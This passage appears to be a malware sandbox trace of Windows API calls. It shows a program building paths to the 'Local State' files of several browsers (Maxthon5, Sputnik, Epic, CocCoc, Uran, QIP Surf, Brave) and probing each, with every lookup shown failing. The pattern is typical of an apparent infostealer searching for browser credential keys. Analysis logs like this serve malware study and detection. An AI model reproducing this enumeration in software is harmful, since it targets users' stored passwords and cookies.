CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=64, lpWideCharStr=0x3970048, cchWideChar=64 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\\\Local State") returned 64 [0109.142] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a11c0 [0109.142] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.142] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\maxthon5\\users\\local state")) returned 0xffffffff [0109.142] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.142] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.142] GetLastError () returned 0x3 [0109.142] SetLastError (dwErrCode=0x3) [0109.142] GetLastError () returned 0x3 [0109.142] SetLastError (dwErrCode=0x3) [0109.142] GetLastError () returned 0x3 [0109.142] SetLastError (dwErrCode=0x3) [0109.142] GetLastError () returned 0x3 [0109.142] SetLastError (dwErrCode=0x3) [0109.142] GetLastError () returned 0x3 [0109.142] SetLastError (dwErrCode=0x3) [0109.142] GetLastError () returned 0x3 [0109.142] SetLastError (dwErrCode=0x3) [0109.142] GetLastError () returned 0x3 [0109.142] SetLastError (dwErrCode=0x3) [0109.142] GetLastError () returned 0x3 [0109.143] SetLastError (dwErrCode=0x3) [0109.143] GetLastError () returned 0x3 [0109.143] SetLastError (dwErrCode=0x3) [0109.143] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x208007c, ftCreationTime.dwLowDateTime=0x90, ftCreationTime.dwHighDateTime=0x208007c, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x12, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x739dd0, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.143] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.143] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Sputnik\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\" [0109.143] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\" [0109.143] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\\\" [0109.143] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\\\Local State" [0109.143] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=67, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0109.143] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x86) returned 0x3970048 [0109.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=67, lpWideCharStr=0x3970048, cchWideChar=67 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\\\Local State") returned 67 [0109.144] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a11c0 [0109.144] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.144] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\sputnik\\user data\\local state")) returned 0xffffffff [0109.144] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.144] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.144] GetLastError () returned 0x3 [0109.144] SetLastError (dwErrCode=0x3) [0109.144] GetLastError () returned 0x3 [0109.144] SetLastError (dwErrCode=0x3) [0109.144] GetLastError () returned 0x3 [0109.144] SetLastError (dwErrCode=0x3) [0109.144] GetLastError () returned 0x3 [0109.144] SetLastError (dwErrCode=0x3) [0109.144] GetLastError () returned 0x3 [0109.144] SetLastError (dwErrCode=0x3) [0109.144] GetLastError () returned 0x3 [0109.144] SetLastError (dwErrCode=0x3) [0109.144] GetLastError () returned 0x3 [0109.145] SetLastError (dwErrCode=0x3) [0109.145] GetLastError () returned 0x3 [0109.145] SetLastError (dwErrCode=0x3) [0109.145] GetLastError () returned 0x3 [0109.145] SetLastError (dwErrCode=0x3) [0109.145] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x2080082, ftCreationTime.dwLowDateTime=0x98, ftCreationTime.dwHighDateTime=0x6c0260, ftLastAccessTime.dwLowDateTime=0x7f, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7464d0, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.145] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.145] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Epic Privacy Browser\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\" [0109.145] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\" [0109.145] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\\\" [0109.145] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\\\Local State" [0109.145] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=80, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0109.145] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x3970048 [0109.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=80, lpWideCharStr=0x3970048, cchWideChar=80 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\\\Local State") returned 80 [0109.145] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a11c0 [0109.145] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.145] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\epic privacy browser\\user data\\local state")) returned 0xffffffff [0109.146] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.146] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.146] GetLastError () returned 0x3 [0109.146] SetLastError (dwErrCode=0x3) [0109.146] GetLastError () returned 0x3 [0109.146] SetLastError (dwErrCode=0x3) [0109.146] GetLastError () returned 0x3 [0109.146] SetLastError (dwErrCode=0x3) [0109.146] GetLastError () returned 0x3 [0109.146] SetLastError (dwErrCode=0x3) [0109.146] GetLastError () returned 0x3 [0109.146] SetLastError (dwErrCode=0x3) [0109.146] GetLastError () returned 0x3 [0109.146] SetLastError (dwErrCode=0x3) [0109.146] GetLastError () returned 0x3 [0109.146] SetLastError (dwErrCode=0x3) [0109.146] GetLastError () returned 0x3 [0109.147] SetLastError (dwErrCode=0x3) [0109.147] GetLastError () returned 0x3 [0109.147] SetLastError (dwErrCode=0x3) [0109.147] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x208009c, ftCreationTime.dwLowDateTime=0xb0, ftCreationTime.dwHighDateTime=0x208009c, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x16, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x718358, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="t")) returned 0xffffffff [0109.147] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.147] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\CocCoc\\Browser\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\" [0109.147] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\" [0109.147] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\\\" [0109.147] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\\\Local State" [0109.147] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=74, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0109.147] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x94) returned 0x3970048 [0109.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=74, lpWideCharStr=0x3970048, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\\\Local State") returned 74 [0109.147] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a11c0 [0109.147] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.147] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coccoc\\browser\\user data\\local state")) returned 0xffffffff [0109.147] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.148] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.148] GetLastError () returned 0x3 [0109.148] SetLastError (dwErrCode=0x3) [0109.148] GetLastError () returned 0x3 [0109.148] SetLastError (dwErrCode=0x3) [0109.148] GetLastError () returned 0x3 [0109.148] SetLastError (dwErrCode=0x3) [0109.148] GetLastError () returned 0x3 [0109.148] SetLastError (dwErrCode=0x3) [0109.148] GetLastError () returned 0x3 [0109.148] SetLastError (dwErrCode=0x3) [0109.148] GetLastError () returned 0x3 [0109.148] SetLastError (dwErrCode=0x3) [0109.148] GetLastError () returned 0x3 [0109.148] SetLastError (dwErrCode=0x3) [0109.148] GetLastError () returned 0x3 [0109.148] SetLastError (dwErrCode=0x3) [0109.148] GetLastError () returned 0x3 [0109.149] SetLastError (dwErrCode=0x3) [0109.149] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x2080090, ftCreationTime.dwLowDateTime=0xa8, ftCreationTime.dwHighDateTime=0x2080090, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x15, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6ed1a8, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.149] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.149] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\uCozMedia\\Uran\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\" [0109.149] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\" [0109.149] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\\\" [0109.149] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\\\Local State" [0109.149] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=74, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0109.149] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x94) returned 0x3970048 [0109.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=74, lpWideCharStr=0x3970048, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\\\Local State") returned 74 [0109.149] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a11c0 [0109.149] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.149] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\ucozmedia\\uran\\user data\\local state")) returned 0xffffffff [0109.149] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.149] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.149] GetLastError () returned 0x3 [0109.150] SetLastError (dwErrCode=0x3) [0109.150] GetLastError () returned 0x3 [0109.150] SetLastError (dwErrCode=0x3) [0109.150] GetLastError () returned 0x3 [0109.150] SetLastError (dwErrCode=0x3) [0109.150] GetLastError () returned 0x3 [0109.150] SetLastError (dwErrCode=0x3) [0109.150] GetLastError () returned 0x3 [0109.150] SetLastError (dwErrCode=0x3) [0109.150] GetLastError () returned 0x3 [0109.150] SetLastError (dwErrCode=0x3) [0109.150] GetLastError () returned 0x3 [0109.150] SetLastError (dwErrCode=0x3) [0109.150] GetLastError () returned 0x3 [0109.150] SetLastError (dwErrCode=0x3) [0109.150] GetLastError () returned 0x3 [0109.150] SetLastError (dwErrCode=0x3) [0109.150] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x2080090, ftCreationTime.dwLowDateTime=0xa8, ftCreationTime.dwHighDateTime=0x2080090, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x15, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6ed1a8, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.150] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.151] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\QIP Surf\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\" [0109.151] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\" [0109.151] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\\\" [0109.151] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\\\Local State" [0109.151] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=68, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0109.151] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x88) returned 0x3970048 [0109.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=68, lpWideCharStr=0x3970048, cchWideChar=68 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\\\Local State") returned 68 [0109.151] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a11c0 [0109.151] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.151] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\qip surf\\user data\\local state")) returned 0xffffffff [0109.151] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.151] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.151] GetLastError () returned 0x3 [0109.151] SetLastError (dwErrCode=0x3) [0109.151] GetLastError () returned 0x3 [0109.151] SetLastError (dwErrCode=0x3) [0109.151] GetLastError () returned 0x3 [0109.151] SetLastError (dwErrCode=0x3) [0109.151] GetLastError () returned 0x3 [0109.152] SetLastError (dwErrCode=0x3) [0109.152] GetLastError () returned 0x3 [0109.152] SetLastError (dwErrCode=0x3) [0109.152] GetLastError () returned 0x3 [0109.152] SetLastError (dwErrCode=0x3) [0109.152] GetLastError () returned 0x3 [0109.152] SetLastError (dwErrCode=0x3) [0109.152] GetLastError () returned 0x3 [0109.152] SetLastError (dwErrCode=0x3) [0109.152] GetLastError () returned 0x3 [0109.152] SetLastError (dwErrCode=0x3) [0109.152] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x2080084, ftCreationTime.dwLowDateTime=0x98, ftCreationTime.dwHighDateTime=0x6c0260, ftLastAccessTime.dwLowDateTime=0x7f, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7464d0, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.152] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.152] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\brave\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\brave\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\brave\\" [0109.152] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\brave\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\brave\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\brave\\" [0109.152] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\brave\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\brave\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\brave\\\\" [0109.152] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\brave\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\brave\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\brave\\\\Local State" [0109.153] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1478 [0109.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=55, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0109.153] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x6e) returned 0x3970048 [0109.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=55, lpWideCharStr=0x3970048, cchWideChar=55 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\brave\\\\Local State") returned 55 [0109.153] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a11c0 [0109.153] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.153] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\brave\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\brave\\local state")) returned 0xffffffff [0109.153] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.153] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.153] GetLastError () returned 0x3 [0109.153] SetLastError (dwErrCode=0x3) [0109.153] GetLastError () returned 0x3 [0109.153] SetLastError (dwErrCode=0x3) [0109.153] GetLastError () returned 0x3 [0109.153] SetLastError (dwErrCode=0x3) [0109.153] GetLastError () returned 0x3 [0109.153] SetLastError (dwErrCode=0x3) [0109.153] GetLastError () returned 0x3 [0109.153] SetLastError (dwErrCode=0x3) [0109.153] GetLastError () returned 0x3 [0109.153] SetLastError (dwErrCode=0x3) [0109.153] GetLastError () returned 0x3 [0109.153] SetLastError (dwErrCode=0x3) [0109.153] GetLastError () returned 0x3 [0109.154] SetLastError (dwErrCode=0x3) [0109.154] GetLastError () returned 0x3 [0109.154] SetLastError (dwErrCode=0x3) [0109.154] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\brave\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x208006a, ftCreationTime.dwLowDateTime=0x80, ftCreationTime.dwHighDateTime=0x208006a, ftLastAccessTime.dwLowDateTime=0x19f010, 